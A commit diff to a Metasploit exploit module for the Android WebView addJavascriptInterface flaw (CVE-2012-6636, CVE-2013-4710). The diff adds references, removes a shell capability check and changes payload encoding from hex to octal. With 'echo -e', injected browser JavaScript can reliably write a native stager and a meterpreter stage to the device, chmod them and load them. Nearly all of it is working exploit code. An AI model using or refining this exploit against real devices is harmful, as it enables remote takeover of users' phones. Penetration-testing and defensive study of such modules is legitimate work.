Use octal encoding and -e, so that echo always works.

Author: joevennix

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -69,7 +69,11 @@ def initialize(info = {})
         ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
         ['URL', 'http://50.56.33.56/blog/?p=314'],
         ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
-        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
+        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
+        ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
+        ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
+        ['EDB', '31519'],
+        ['OSVDB', '97520']
       ],
       'Platform'            => 'android',
       'Arch'                => ARCH_DALVIK,
@@ -89,8 +93,6 @@ def initialize(info = {})
   def on_request_uri(cli, req)
     if req.uri =~ /\.js/
       serve_static_js(cli, req)
-    elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100
-      print_warning "Received message: #{req.body}"
     else
       super
     end
@@ -139,28 +141,15 @@ def js(arch)
                          .getMethod('getRuntime', null)
                          .invoke(null, null);
 
-        // now ensure we can write out a hex-encoded byte with the shell's echo builtin
-        var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']);
-        if (byte.indexOf("\\\\") > -1) {
-          // if youre havin byte problems
-          var xml = new XMLHttpRequest();
-          // i feel bad for you son
-          xml.open('POST', '#{get_module_resource}.msg', false);
-          // i got \\x63 problems
-          xml.send("Unsupported shell echo builtin: exploit aborted.");
-          // but your shell aint one
-          return true;
-        }
-
         // libraryData contains the bytes for a native shared object built via NDK
         // which will load the "stage", which in this case is our android meterpreter stager.
         // LibraryData is loaded via ajax later, because we have to access javascript in
         // order to detect what arch we are running.
-        var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}";
+        var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
 
         // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
         // another stager which loads android meterpreter from the msf handler.
-        var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
+        var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
 
         // get the process name, which will give us our data path
         // $PPID does not seem to work on android 4.0, so we concat pids manually
@@ -170,11 +159,11 @@ def js(arch)
         var stagePath = path + '/#{stagename}.apk';
 
         // build the library and chmod it
-        runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
+        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
         runtime.exec(['chmod', '700', libraryPath]).waitFor();
 
         // build the stage, chmod it, and load it
-        runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
+        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
         runtime.exec(['chmod', '700', stagePath]).waitFor();
 
         // load the library (this fails in x86, figure out why)